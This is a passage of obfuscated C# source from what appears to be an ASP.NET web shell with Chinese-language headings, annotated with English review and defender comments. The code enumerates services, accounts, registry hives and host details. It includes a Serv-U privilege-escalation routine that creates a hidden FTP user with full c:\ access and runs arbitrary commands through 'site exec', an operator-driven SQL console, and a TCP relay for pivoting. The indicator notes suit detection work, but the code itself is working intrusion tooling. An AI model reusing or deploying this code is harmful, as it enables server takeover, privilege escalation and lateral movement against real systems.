{
bin_h2_title.innertext="系统服务 >>";
wicxe();
iqxm.visible=true;
int uebti=0;
datatable dt=ccf("win32_service");
for(int j=0;j<dt.rows.count;j++)
{
uebti++;
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tr.attributes["title"]=dt.rows[j]["description"].tostring();
for(int i=1;i<7;i++)
{
tablecell td=new tablecell();
if(i==1)
{
td.width=unit.parse("2%");
td.text=uebti.tostring();
tr.controls.add(td);
}
if(i==2)
{
td.text=dt.rows[j]["processid"].tostring();
tr.controls.add(td);
}
if(i==3)
{
td.text=dt.rows[j]["name"].tostring();
tr.controls.add(td);
}
if(i==4)
{
td.text=dt.rows[j]["pathname"].tostring();
tr.controls.add(td);
}
if(i==5)
{
string koio=dt.rows[j]["state"].tostring();
if(koio=="running")
{
td.text="<font color=green>"+koio+"</font>";
}
else
{
td.text="<font color=red>"+koio+"</font>";
}
tr.controls.add(td);
}
if(i==6)
{
td.text=dt.rows[j]["startmode"].tostring();
tr.controls.add(td);
}
}
vhcs.controls.add(tr);
}
}
catch(exception error)
{
ohpf();
}
}
// Shows the accounts view (heading reads "User (group) information >>") by walking the children of
// the local machine's "winnt://" directory entry and printing every property name/value pair except
// objectsid, parameters and loginhours, with a thin separator row after each child.
// Errors are reported through xseub(). ilvut() falls back to this method when its WMI listing fails.
public void pld()
{
try
{
wicxe();
xwvq.visible=true;
bin_h2_title.innertext="用户(组)信息 >>";
directoryentry twq=new directoryentry("winnt://"+environment.machinename.tostring());
foreach(directoryentry child in twq.children)
{
foreach(string name in child.properties.propertynames)
{
propertyvaluecollection pvc=child.properties[name];
int c=pvc.count;
for(int i=0;i<c;i++)
{
if(name!="objectsid" && name!="parameters" && name!="loginhours")
{
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tablecell td=new tablecell();
td.text=name;
tr.controls.add(td);
tablecell td1=new tablecell();
td1.text=pvc[i].tostring();
tr.controls.add(td1);
vpa.controls.add(tr);
}
}
}
// Separator row between entries.
tablerow trn=new tablerow();
for(int x=1;x<3;x++)
{
tablecell tdn=new tablecell();
tdn.attributes["style"]="height:2px;background-color:#bbbbbb;";
trn.controls.add(tdn);
vpa.controls.add(trn);
}
}
}
catch(exception error)
{
xseub(error.message);
}
}
// Shows the accounts view (heading reads "User (group) information >>") from WMI class
// win32_useraccount: for every account, one row per column with the column name and its value,
// followed by a thin separator row. On any exception it falls back to pld().
public void ilvut()
{
try
{
wicxe();
xwvq.visible=true;
bin_h2_title.innertext="用户(组)信息 >>";
datatable user=ccf("win32_useraccount");
for(int i=0;i<user.rows.count;i++)
{
for(int j=0;j<user.columns.count;j++)
{
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tablecell td=new tablecell();
td.text=user.columns[j].tostring();
tr.controls.add(td);
tablecell td1=new tablecell();
td1.text=user.rows[i][j].tostring();
tr.controls.add(td1);
vpa.controls.add(tr);
}
// Separator row between accounts.
tablerow trn=new tablerow();
for(int x=1;x<3;x++)
{
tablecell tdn=new tablecell();
tdn.attributes["style"]="height:2px;background-color:#bbbbbb;";
trn.controls.add(tdn);
vpa.controls.add(trn);
}
}
}
catch(exception error)
{
pld();
}
}
// Shows the system-information view (headings read "System information", "Network adapter information"
// and "Driver information"). It collects, from registry keys, server variables, the environment and
// WMI: host name, IP and port, the terminal-services port number, OS version, web server software,
// the account the page runs as, server time and time zone, BIOS, CPU count and name, physical memory,
// network adapters with MAC addresses, and system drivers with their paths.
// Errors are reported through xseub().
// Defender note: this is host reconnaissance gathered in a single request; registry reads under the
// terminal server key and a burst of WMI class queries from the web worker process are the
// host-side traces.
public void pdvm()
{
try
{
// Terminal-services listener port, read through ddmpl().
registrykey eez=registry.localmachine.opensubkey(@"system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp");
string ikjwh=ddmpl(eez,"portnumber");
// CPU count is the number of sub-keys under centralprocessor; the name comes from processor 0.
registrykey izn=registry.localmachine.opensubkey(@"hardware\description\system\centralprocessor");
int cpu=izn.subkeycount;
registrykey mqii=registry.localmachine.opensubkey(@"hardware\description\system\centralprocessor\0\");
string nppz=ddmpl(mqii,"processornamestring");
wicxe();
ghab.visible=true;
bin_h2_title.innertext="系统信息 >>";
bin_h2_mac.innertext="网卡信息 >>";
bin_h2_driver.innertext="驱动信息 >>";
// Three HTML fragments: system, network adapters, drivers.
stringbuilder yewc=new stringbuilder();
stringbuilder hwjes=new stringbuilder();
stringbuilder jxkae=new stringbuilder();
yewc.append("<li><u>server domain : </u>"+request.servervariables["server_name"]+"</li>");
yewc.append("<li><u>server ip : </u>"+request.servervariables["local_addr"]+":"+request.servervariables["server_port"]+"</li>");
yewc.append("<li><u>terminal port : </u>"+ikjwh+"</li>");
yewc.append("<li><u>server os : </u>"+environment.osversion+"</li>");
yewc.append("<li><u>server software : </u>"+request.servervariables["server_software"]+"</li>");
yewc.append("<li><u>server username : </u>"+environment.username+"</li>");
yewc.append("<li><u>server time : </u>"+system.datetime.now.tostring()+"</li>");
yewc.append("<li><u>server timezone : </u>"+ccf("win32_timezone").rows[0]["caption"]+"</li>");
datatable bios=ccf("win32_bios");
yewc.append("<li><u>server bios : </u>"+bios.rows[0]["manufacturer"]+" : "+bios.rows[0]["name"]+"</li>");
yewc.append("<li><u>cpu count : </u>"+cpu.tostring()+"</li>");
yewc.append("<li><u>cpu version : </u>"+nppz+"</li>");
// Sums a capacity value once per physical memory row.
datatable upm=ccf("win32_physicalmemory");
int64 oznzv=0;
for(int i=0;i<upm.rows.count;i++)
{
oznzv+=int64.parse(upm.rows[0]["capacity"].tostring());
}
yewc.append("<li><u>server upm : </u>"+mtg(oznzv)+"</li>");
datatable doza=ccf("win32_networkadapterconfiguration");
for(int i=0;i<doza.rows.count;i++)
{
hwjes.append("<li><u>server mac"+i+" : </u>"+doza.rows[i]["caption"]+"</li>");
if(doza.rows[i]["macaddress"]!=string.empty)
{
hwjes.append("<li style=\"list-style:none;\"><u>address : </u>"+doza.rows[i]["macaddress"]+"</li>");
}
}
datatable driver=ccf("win32_systemdriver");
for (int i=0; i<driver.rows.count; i++)
{
jxkae.append("<li><u class='u1'>server driver"+i+" : </u><u class='u2'>"+driver.rows[i]["caption"]+"</u> ");
if (driver.rows[i]["pathname"]!=string.empty)
{
jxkae.append("path : "+driver.rows[i]["pathname"]);
}
else
{
jxkae.append("no path information");
}
jxkae.append("</li>");
}
bin_ul_sys.innerhtml=yewc.tostring();
bin_ul_netconfig.innerhtml=hwjes.tostring();
bin_ul_driver.innerhtml=jxkae.tostring();
}
catch(exception error)
{
xseub(error.message);
}
}
// Shows the panel whose heading reads "serv-u privilege escalation >>"; the action behind it is ldodr().
public void adcpk()
{
wicxe();
apl.visible=true;
bin_h2_title.innertext="serv-u 提权 >>";
}
// Action behind the Serv-U panel. Using the user name, password, port and command taken from form
// controls, it connects to 127.0.0.1 on that port, logs in, enters "site maintenance", and sends
// maintenance commands that delete and then create a domain on port 52521 and set up a user "bin" with
// password "binftp" and home directory c:\. It then connects to the server's own address on port
// 52521, logs in as that user, sends a "site exec" line carrying the command, quits, and finally sends
// the delete-domain command again on the first connection. Both conversations are echoed into
// bin_td_res by rev() and zjim(); errors are reported through xseub().
// Defender note: the values fixed in this listing are the indicators to hunt for: a short-lived FTP
// listener on port 52521, an FTP account named "bin", and loopback TCP connections from the web
// worker process to the local FTP administration port. Mitigation is on the FTP server side: a
// non-default local administration credential and a service account that is not highly privileged.
public void ldodr()
{
string jggg=string.empty;
string user=dnohj.value;
string pass=nmd.value;
int port=int32.parse(hlql.value);
string cmd=mhbjb.value;
// Protocol lines sent on the first (administration) connection.
string crtk="user "+user+"\r\n";
string jnng="pass "+pass+"\r\n";
string site="site maintenance\r\n";
string mtojb="-deletedomain\r\n-ip=0.0.0.0\r\n portno=52521\r\n";
string suti="-setdomain\r\n-domain=bin|0.0.0.0|52521|-1|1|0\r\n-tzoenable=0\r\n tzokey=\r\n";
string ivdt="-setusersetup\r\n-ip=0.0.0.0\r\n-portno=52521\r\n-user=bin\r\n-password=binftp\r\n-homedir=c:\\\r\n-loginmesfile=\r\n-disable=0\r\n-relpaths=1\r\n-needsecure=0\r\n-hidehidden=0\r\n-alwaysallowlogin=0\r\n-changepassword=0\r\n-quotaenable=0\r\n-maxusersloginperip=-1\r\n-speedlimitup=0\r\n-speedlimitdown=0\r\n-maxnrusers=-1\r\n-idletimeout=600\r\n-sessiontimeout=-1\r\n-expire=0\r\n-ratiodown=1\r\n-ratioscredit=0\r\n-quotacurrent=0\r\n-quotamaximum=0\r\n-maintenance=system\r\n-passwordtype=regular\r\n-ratios=nonern\r\n access=c:\\|rwamelcdp\r\n";
string zexn="quit\r\n";
uhla.visible=true;
try
{
// First connection: local administration port supplied by the form.
tcp.connect("127.0.0.1",port);
tcp.receivebuffersize=1024;
ns=tcp.getstream();
rev(ns);
zjim(ns,crtk);
rev(ns);
zjim(ns,jnng);
rev(ns);
zjim(ns,site);
rev(ns);
zjim(ns,mtojb);
rev(ns);
zjim(ns,suti);
rev(ns);
zjim(ns,ivdt);
rev(ns);
bin_td_res.innerhtml+="<font color=\"green\"><b>exec cmd.................\r\n</b></font>";
// Second connection: the domain just created on port 52521.
zvxm.connect(request.servervariables["local_addr"],52521);
ns1=zvxm.getstream();
rev(ns1);
zjim(ns1,"user bin\r\n");
rev(ns1);
zjim(ns1,"pass binftp\r\n");
rev(ns1);
zjim(ns1,"site exec "+cmd+"\r\n");
rev(ns1);
zjim(ns1,"quit\r\n");
rev(ns1);
zvxm.close();
// Remove the temporary domain again on the first connection.
zjim(ns,mtojb);
rev(ns);
tcp.close();
}
catch(exception error)
{
xseub(error.message);
}
}
// Reads whatever the peer has sent on instream and appends it, in red and with NUL characters
// removed, to the result cell bin_td_res. It sleeps 50 ms before each read and keeps reading in
// 1024-byte chunks while more data is reported available; bytes are decoded with the system default encoding.
protected void rev(networkstream instream)
{
string ftbtf=string.empty;
if(instream.canread)
{
byte[] upz=new byte[1024];
do
{
system.threading.thread.sleep(50);
int len=instream.read(upz,0,upz.length);
ftbtf+=encoding.default.getstring(upz,0,len);
}
while(instream.dataavailable);
}
bin_td_res.innerhtml+="<font color=red>"+ftbtf.replace("\0","")+"</font>";
}
// Writes sendstr to instream (encoded with the system default encoding) when the stream is writable,
// and appends the sent text, in blue, to the result cell bin_td_res.
protected void zjim(networkstream instream,string sendstr)
{
if(instream.canwrite)
{
byte[] upz=encoding.default.getbytes(sendstr);
instream.write(upz,0,upz.length);
}
bin_td_res.innerhtml+="<font color=blue>"+sendstr+"</font>";
}
// Shows the registry view (heading reads "Registry query >>"): writes one link per root hive into
// vyx, each posting the base64 hive name to the 'bin_regread' action, then fills the table via lfavw().
public void xfhz()
{
wicxe();
kkhn.visible=true;
bin_h2_title.innertext="注册表查询 >>";
string txc=@"hkey_local_machine|hkey_classes_root|hkey_current_user|hkey_users|hkey_current_config";
vyx.text="";
foreach(string rootkey in txc.split('|'))
{
vyx.text+="<a href=\"javascript:bin_postback('bin_regread','"+mvvj(rootkey)+"')\">"+rootkey+"</a> | ";
}
lfavw();
}
// Fills table plwd with one row per root hive: a link posting the base64 hive name to the
// 'bin_regread' action, and the literal marker "<rootkey>". Clears the current-key display qpdi first.
protected void lfavw()
{
qpdi.text="";
string txc=@"hkey_local_machine|hkey_classes_root|hkey_current_user|hkey_users|hkey_current_config";
tablerow tr;
tablecell tc;
foreach(string rootkey in txc.split('|'))
{
tr=new tablerow();
tc=new tablecell();
string bg=okm();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tc.width=unit.parse("40%");
tc.text="<a href=\"javascript:bin_postback('bin_regread','"+mvvj(rootkey)+"')\">"+rootkey+"</a>";
tr.cells.add(tc);
tc=new tablecell();
tc.width=unit.parse("60%");
tc.text="<rootkey>";
tr.cells.add(tc);
plwd.rows.add(tr);
}
}
// Lists one registry key into table plwd. reg_path is "<hive name>\<sub-key path>"; a trailing
// backslash is added when missing. Output, in order: a "parent key" link, one row per sub-key (linking
// to that sub-key), a separator row, and one row per value with its name and its data as rendered by
// ddmpl(). Errors while opening or enumerating are reported through xseub().
// Defender note: this is read-only browsing of any hive the worker identity can open; which keys are
// readable is decided by registry ACLs, and object-access auditing on sensitive keys is what records it.
protected void tprq(string reg_path)
{
if(!reg_path.endswith("\\"))
{
reg_path=reg_path+"\\";
}
qpdi.text=reg_path;
// Parent path: drop the last path segment, then collapse repeated backslashes.
string cjg=regex.replace(reg_path,@"\\[^\\]+\\?$","");
cjg=regex.replace(cjg,@"\\+","\\");
tablerow tr=new tablerow();
tablecell tc=new tablecell();
string bg=okm();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tc.text="<a href=\"javascript:bin_postback('bin_regread','"+mvvj(cjg)+"')\">parent key</a>";
tc.attributes["colspan"]="2" ;
tr.cells.add(tc);
plwd.rows.add(tr);
try
{
string subpath;
// Everything after the first backslash is the sub-key path inside the hive.
string kdgkx=reg_path.substring(reg_path.indexof("\\")+1,reg_path.length-reg_path.indexof("\\")-1);
registrykey rk=null;
registrykey sk;
// Map the hive name prefix to the corresponding root key object.
if(reg_path.startswith("hkey_local_machine"))
{
rk=registry.localmachine;
}
else if(reg_path.startswith("hkey_classes_root"))
{
rk=registry.classesroot;
}
else if(reg_path.startswith("hkey_current_user"))
{
rk=registry.currentuser;
}
else if(reg_path.startswith("hkey_users"))
{
rk=registry.users;
}
else if(reg_path.startswith("hkey_current_config"))
{
rk=registry.currentconfig;
}
// A sub-key path longer than one character is opened; otherwise the hive root itself is listed.
if(kdgkx.length>1)
{
sk=rk.opensubkey(kdgkx);
}
else
{
sk=rk;
}
foreach(string innersubkey in sk.getsubkeynames())
{
tr=new tablerow();
tc=new tablecell();
bg=okm();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tc.width=unit.parse("40%");
tc.text="<a href=\"javascript:bin_postback('bin_regread','"+mvvj(reg_path+innersubkey)+"')\">"+innersubkey+"</a>";
tr.cells.add(tc);
tc=new tablecell();
tc.width=unit.parse("60%");
tc.text="<subkey>";
tr.cells.add(tc);
plwd.rows.add(tr);
}
// Separator row between sub-keys and values.
tablerow ckva=new tablerow();
ckva.attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
ckva.attributes["bgcolor"]="#dddddd";
tablecell jlmw=new tablecell();
jlmw.attributes["colspan"]="2" ;
jlmw.attributes["height"]="5";
ckva.cells.add(jlmw);
plwd.rows.add(ckva);
foreach(string strvaluename in sk.getvaluenames())
{
tr=new tablerow();
tc=new tablecell();
bg=okm();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tc.width=unit.parse("40%");
tc.text=strvaluename;
tr.cells.add(tc);
tc=new tablecell();
tc.width=unit.parse("60%");
tc.text=ddmpl(sk,strvaluename);
tr.cells.add(tc);
plwd.rows.add(tr);
}
}
catch(exception error)
{
xseub(error.message);
}
}
// Returns registry value strvaluename of key sk as display text. A missing value yields the string
// "null". Byte arrays are rendered as hex with each byte zero-padded to two digits, string arrays are
// concatenated without a separator, and anything else uses its string form.
// On an exception the message is reported through xseub() and whatever was built so far is returned.
public string ddmpl(registrykey sk,string strvaluename)
{
object upz;
string ratgr="";
try
{
upz=sk.getvalue(strvaluename,"null");
if(upz.gettype()==typeof(byte[]))
{
foreach(byte tmpbyte in(byte[])upz)
{
// Pad single-digit hex values with a leading zero.
if((int)tmpbyte<16)
{
ratgr+="0";
}
ratgr+=tmpbyte.tostring("x");
}
}
else if(upz.gettype()==typeof(string[]))
{
foreach(string tmpstr in(string[])upz)
{
ratgr+=tmpstr;
}
}
else
{
ratgr=upz.tostring();
}
}
catch(exception error)
{
xseub(error.message);
}
return ratgr;
}
// Shows the panel whose heading reads "Port scan >>". Only the view switch is visible here;
// the scanning code itself is not in this part of the file.
public void vnchz()
{
wicxe();
ywlb.visible=true;
bin_h2_title.innertext="端口扫描 >>";
}
// Shows the database panel (heading reads "Database >>"): makes idgml visible and hides dqiif.
public void rahe()
{
wicxe();
idgml.visible=true;
dqiif.visible=false;
bin_h2_title.innertext="数据库 >>";
}
// Opens the page-level OLE DB connection (dtdr) if it is currently closed and
// attaches the shared command object (kkvb) to it.
// The connection string is taken verbatim from the masr control, so whoever
// submits the form decides which data source the web server connects to.
// Connection failures are reported through xseub() and otherwise ignored; the
// caller is not told that the connection is still closed.
protected void ouj()
{
if(dtdr.state==connectionstate.closed)
{
try
{
dtdr.connectionstring=masr.text;
kkvb.connection=dtdr;
dtdr.open();
}
catch(exception error)
{
xseub(error.message);
}
}
}
// Tears down the shared database objects.
// The if has no braces, so only close() is conditional: both dispose() calls
// run on every invocation, whether or not the connection was open.
protected void fuze()
{
if(dtdr.state==connectionstate.open)
dtdr.close();
dtdr.dispose();
kkvb.dispose();
}
// Runs sqlstr as a text command on the shared connection and returns the
// result set as a datatable.
//   sqlstr - SQL text, executed as given
// Every exception is swallowed by the empty catch, so a failed query is
// indistinguishable from one that returned no rows: the caller gets an empty
// table. fuze() runs in finally, so the connection is closed and disposed
// after each call.
public datatable cyue(string sqlstr)
{
oledbdataadapter da=new oledbdataadapter();
datatable dstog=new datatable();
try
{
ouj();
kkvb.commandtype=commandtype.text;
kkvb.commandtext=sqlstr;
da.selectcommand=kkvb;
da.fill(dstog);
}
catch(exception)
{
}
finally
{
fuze();
}
return dstog;
}
// Executes a multi-batch SQL script and returns every result table produced.
//   query - SQL text; batches are separated by a line containing "go"
// The script is split at each match of the separator regex, each non-empty
// piece is run as its own text command, and all tables from all batches are
// collected in order. The text after the last separator is run the same way.
// Only sqlexception is caught here although the command is an OLE DB command;
// other exception types propagate to the caller.
// NOTE(review): the character classes read [gg][oo] on this page, which is
// presumably a lower-cased rendering of a case-insensitive "GO" match - confirm
// against an original sample.
public datatable[] bin_data(string query)
{
arraylist list=new arraylist();
try
{
string str;
ouj();
// A trailing line break lets a separator on the final line match the regex.
query=query+"\r\n";
matchcollection gcod=new regex("[\r\n][gg][oo][\r\n]").matches(query);
// emrx is the start offset of the batch currently being cut out.
int emrx=0;
for(int i=0;i<gcod.count;i++)
{
match fjd=gcod[i];
str=query.substring(emrx,fjd.index-emrx);
if(str.trim().length>0)
{
oledbdataadapter fgzeq=new oledbdataadapter();
kkvb.commandtype=commandtype.text;
kkvb.commandtext=str.trim();
fgzeq.selectcommand=kkvb;
dataset cdpp=new dataset();
fgzeq.fill(cdpp);
for(int j=0;j<cdpp.tables.count;j++)
{
list.add(cdpp.tables[j]);
}
}
// Skip past the separator; any character left over is removed by trim() above.
emrx=fjd.index+3;
}
str=query.substring(emrx,query.length-emrx);
if(str.trim().length>0)
{
oledbdataadapter vwb=new oledbdataadapter();
kkvb.commandtype=commandtype.text;
kkvb.commandtext=str.trim();
vwb.selectcommand=kkvb;
dataset arg=new dataset();
vwb.fill(arg);
for(int k=0;k<arg.tables.count;k++)
{
list.add(arg.tables[k]);
}
}
}
catch(sqlexception e)
{
xseub(e.message);
rom.visible=false;
}
return(datatable[])list.toarray(typeof(datatable));
}
// Executes instr as a non-query SQL statement on the shared connection.
//   instr - SQL text, executed as given
// Nothing is returned; any exception message is shown through xseub().
public void jiaku(string instr)
{
try
{
ouj();
kkvb.commandtype=commandtype.text;
kkvb.commandtext=instr;
kkvb.executenonquery();
}
catch(exception e)
{
xseub(e.message);
}
}
// Runs the SQL text held in the jhiy control and shows the results in the rom
// grid. When the "mssql" source type is selected and a database is chosen in
// pvf, the connection is switched to that database first.
// Each result table is bound to the same grid in turn, so after the loop the
// grid holds the last table; the prerender handler lravm is attached once per
// table. With no results the grid is bound to null. Any exception hides the
// grid and shows the message through xseub().
// Review note (detection): this handler passes operator-typed SQL straight to
// the database under the connection string supplied in the form, so database
// audit logs are the place to look for what was run.
public void dwgt()
{
try
{
ouj();
if(wymo.selecteditem.text=="mssql")
{
if(pvf.selecteditem.value!="")
{
dtdr.changedatabase(pvf.selecteditem.value.tostring());
}
}
datatable[] jxf=null;
jxf=bin_data(jhiy.innertext);
if(jxf!=null && jxf.length>0)
{
for(int j=0;j<jxf.length;j++)
{
rom.prerender+=new eventhandler(lravm);
rom.datasource=jxf[j];
rom.databind();
// Alternate the row style and wire the hover highlight for every grid row.
for(int i=0;i<rom.items.count;i++)
{
string bg=okm();
rom.items[i].cssclass=bg;
rom.items[i].attributes["onmouseover"]="this.classname='focus';";
rom.items[i].attributes["onmouseout"]="this.classname='"+bg+"';";
}
}
}
else
{
rom.datasource=null;
rom.databind();
}
rom.visible=true;
}
catch(exception e)
{
xseub(e.message);
rom.visible=false;
}
}
// Lists the tables of the connected database in the rom grid.
// For the "mssql" source type nothing is listed until a database is chosen in
// pvf (the grid is bound to null and the method returns). Otherwise the OLE DB
// schema is queried twice, once for "system table" and once for "table"; the
// system-table rows are imported into the user-table result, four descriptive
// columns are removed, and the merged table is bound to the grid.
// Any exception hides the grid and shows the message through xseub().
public void xtzy()
{
try
{
if(wymo.selecteditem.text=="mssql")
{
if(pvf.selecteditem.value=="")
{
rom.datasource=null;
rom.databind();
return;
}
}
ouj();
datatable zkvow=new datatable();
datatable jxf=new datatable();
datatable bavjv=new datatable();
if(wymo.selecteditem.text=="mssql" && pvf.selecteditem.value!="")
{
dtdr.changedatabase(pvf.selecteditem.text);
}
zkvow=dtdr.getoledbschematable(oledbschemaguid.tables,new object[] { null,null,null,"system table" });
jxf=dtdr.getoledbschematable(oledbschemaguid.tables,new object[] { null,null,null,"table" });
foreach(datarow dr in zkvow.rows)
{
jxf.importrow(dr);
}
jxf.columns.remove("table_catalog");jxf.columns.remove("table_schema");jxf.columns.remove("description");jxf.columns.remove("table_propid");
rom.prerender+=new eventhandler(lravm);
rom.datasource=jxf;
rom.databind();
// Alternate the row style and wire the hover highlight for every grid row.
for(int i=0;i<rom.items.count;i++)
{
string bg=okm();
rom.items[i].cssclass=bg;
rom.items[i].attributes["onmouseover"]="this.classname='focus';";
rom.items[i].attributes["onmouseout"]="this.classname='"+bg+"';";
}
rom.visible=true;
}
catch(exception e)
{
xseub(e.message);
rom.visible=false;
}
}
// PreRender handler for the result grid: rewrites the text of every cell of
// every row before the grid is rendered.
// NOTE(review): as printed here both replace() calls swap a character for
// itself and change nothing. The shape of the code suggests the replacement
// strings were HTML entities that were decoded when this page was published -
// confirm against an original sample before relying on this listing.
private void lravm(object sender,eventargs e)
{
datagrid d=(datagrid)sender;
foreach(datagriditem item in d.items)
{
foreach(tablecell t in item.cells)
{
t.text=t.text.replace("<","<").replace(">",">");
}
}
}
// Connect handler for the database view.
// For the "mssql" source type it issues five queries through cyue(): server
// version, the database list from master.dbo.sysdatabases, the current
// database, sysadmin role membership and db_owner membership. The database
// names fill the pvf drop-down and the version plus privilege label are
// written into the irtu panel. For any other source type it lists tables via
// xtzy(). Any exception is swallowed and the dqiif panel is hidden.
// Review note (detection): the five fixed queries run back to back right after
// a connection opens, which makes a recognisable sequence in SQL Server audit
// or trace data.
public void vcf()
{
dqiif.visible=true;
try
{
jhiy.innerhtml=string.empty;
if(wymo.selecteditem.text=="mssql")
{
rom.visible=false;
uxevn.visible=true;
irtu.visible=true;
ouj();
datatable ver=cyue(@"select @@version");
datatable dbs=cyue(@"select name from master.dbo.sysdatabases");
datatable cdb=cyue(@"select db_name()");
datatable rol=cyue(@"select is_srvrolemember('sysadmin')");
datatable ykrm=cyue(@"select is_member('db_owner')");
// cyue() returns an empty table on failure, so these row reads throw when a
// query did not succeed; the outer catch then hides the panel.
string jhlh=ver.rows[0][0].tostring();
string dbo=string.empty;
if(ykrm.rows[0][0].tostring()=="1")
{
dbo="db_owner";
}
else
{
dbo="public";
}
// sysadmin membership overrides the label chosen above.
if(rol.rows[0][0].tostring()=="1")
{
dbo="<font color=blue>sa</font>";
}
string db_name=string.empty;
foreach(listitem item in fgey.items)
{
// Note: "=" here is an assignment, not a comparison, so the condition is
// always true and every item ends up deselected.
if(item.selected=true)
{
item.selected=false;
}
}
pvf.items.clear();
pvf.items.add("-- select a database --");
pvf.items[0].value="";
for(int i=0;i<dbs.rows.count;i++)
{
// db_name is built here but is not read again within this method.
db_name+=dbs.rows[i][0].tostring().replace(cdb.rows[0][0].tostring(),"<font color=blue>"+cdb.rows[0][0].tostring()+"</font>")+" | ";
pvf.items.add(dbs.rows[i][0].tostring());
}
// The version string returned by the server is placed into the markup as is.
irtu.innerhtml="<p><font color=red>mssql version</font> : <i><b>"+jhlh+"</b></i></p><p><font color=red>srvrolemember</font> : <i><b>"+dbo+"</b></i></p>";
}
else
{
uxevn.visible=false;
irtu.visible=false;
xtzy();
}
}
catch(exception e)
{
dqiif.visible=false;
}
}
// Switches the page to the port-mapping view: hides the feature panels, shows
// the howtm panel and sets the heading text.
public void mhlv()
{
wicxe();
howtm.visible=true;
bin_h2_title.innertext="端口映射 >>";
}
// TCP relay. The object opens two outbound connections from the web server
// process - one to (remoteaddress, remoteport) and one to
// (localaddress, localport) - and copies bytes between them in both
// directions using asynchronous socket callbacks.
// Every callback wraps its body in a try with an empty catch, so failures are
// silent and leave no trace in the page output.
// Review note (detection): both legs are connections initiated by the
// web-server worker process itself. A worker process that holds a long-lived
// outbound TCP session while also connecting to an internal service port is
// the observable behaviour to alert on in host or network telemetry.
public class portforward
{
public string localaddress;
public int localport;
public string remoteaddress;
public int remoteport;
// type and server are declared but not used anywhere in this class.
string type;
socket ltcpclient;
socket rtcpclient;
socket server;
// One fixed 2048-byte buffer per direction: dprpl carries remote-to-local
// data, wvzv carries local-to-remote data.
byte[] dprpl=new byte[2048];
byte[] wvzv=new byte[2048];
// State object handed through the async callbacks; llen and rlen are never
// assigned or read in this class.
public struct session
{
public socket rdel;
public socket ldel;
public int llen;
public int rlen;
}
// Resolves host by DNS and returns an endpoint for its first address and the
// given port. Not wrapped in a try; callers rely on their own catch blocks.
public static ipendpoint mtj(string host,int port)
{
ipendpoint iep=null;
iphostentry agn=dns.resolve(host);
ipaddress rmt=agn.addresslist[0];
iep=new ipendpoint(rmt,port);
return iep;
}
// Stores the four endpoint parameters, creates both sockets and begins the
// asynchronous connect to the remote endpoint; iigfo runs when it completes.
public void start(string rip,int rport,string lip,int lport)
{
try
{
localport=lport;
remoteaddress=rip;
remoteport=rport;
localaddress=lip;
rtcpclient=new socket(addressfamily.internetwork,sockettype.stream,protocoltype.tcp);
ltcpclient=new socket(addressfamily.internetwork,sockettype.stream,protocoltype.tcp);
rtcpclient.beginconnect(mtj(remoteaddress,remoteport),new asynccallback(iigfo),rtcpclient);
}
catch (exception ex) { }
}
// Remote-connect callback: begins the connect to the local endpoint.
// endconnect() is not called for the remote socket here, so a failed remote
// connect is not detected at this point.
protected void iigfo(iasyncresult ar)
{
try
{
session rkxy=new session();
rkxy.ldel=ltcpclient;
rkxy.rdel=rtcpclient;
ltcpclient.beginconnect(mtj(localaddress,localport),new asynccallback(vtp),rkxy);
}
catch (exception ex) { }
}
// Local-connect callback: completes the local connect and posts the first
// receive on each socket, which starts both copy directions.
protected void vtp(iasyncresult ar)
{
try
{
session rkxy=(session)ar.asyncstate;
ltcpclient.endconnect(ar);
rkxy.rdel.beginreceive(dprpl,0,dprpl.length,socketflags.none,new asynccallback(lfym),rkxy);
rkxy.ldel.beginreceive(wvzv,0,wvzv.length,socketflags.none,new asynccallback(xps),rkxy);
}
catch (exception ex) { }
}
// Remote receive completed: forward the bytes to the local socket, or close
// both sockets when the remote side returned zero bytes.
private void lfym(iasyncresult ar)
{
try
{
session rkxy=(session)ar.asyncstate;
int ret=rkxy.rdel.endreceive(ar);
if (ret>0)
ltcpclient.beginsend(dprpl,0,ret,socketflags.none,new asynccallback(jtcp),rkxy);
else lytok();
}
catch (exception ex) { }
}
// Send to local completed: post the next receive on the remote socket.
private void jtcp(iasyncresult ar)
{
try
{
session rkxy=(session)ar.asyncstate;
rkxy.ldel.endsend(ar);
rkxy.rdel.beginreceive(dprpl,0,dprpl.length,socketflags.none,new asynccallback(this.lfym),rkxy);
}
catch (exception ex) { }
}
// Local receive completed: forward the bytes to the remote socket, or close
// both sockets when the local side returned zero bytes.
private void xps(iasyncresult ar)
{
try
{
session rkxy=(session)ar.asyncstate;
int ret=rkxy.ldel.endreceive(ar);
if (ret>0)
rkxy.rdel.beginsend(wvzv,0,ret,socketflags.none,new asynccallback(izu),rkxy);
else lytok();
}
catch (exception ex) { }
}
// Send to remote completed: post the next receive on the local socket.
private void izu(iasyncresult ar)
{
try
{
session rkxy=(session)ar.asyncstate;
rkxy.rdel.endsend(ar);
rkxy.ldel.beginreceive(wvzv,0,wvzv.length,socketflags.none,new asynccallback(this.xps),rkxy);
}
catch (exception ex) { }
}
// Closes whichever of the two sockets this instance has created.
public void lytok()
{
try
{
if (ltcpclient!=null)
{
ltcpclient.close();
}
if (rtcpclient!=null)
rtcpclient.close();
}
catch (exception ex) { }
}
}
// Creates a fresh portforward object and calls lytok() on it.
// Review note (incident response): the new instance has no sockets yet, so
// this does not touch connections opened by an earlier start() call. Relays
// started from this page should be assumed to live until a peer closes them
// or the hosting process ends, regardless of what the page reports.
protected void vuou()
{
portforward gyp=new portforward();
gyp.lytok();
}
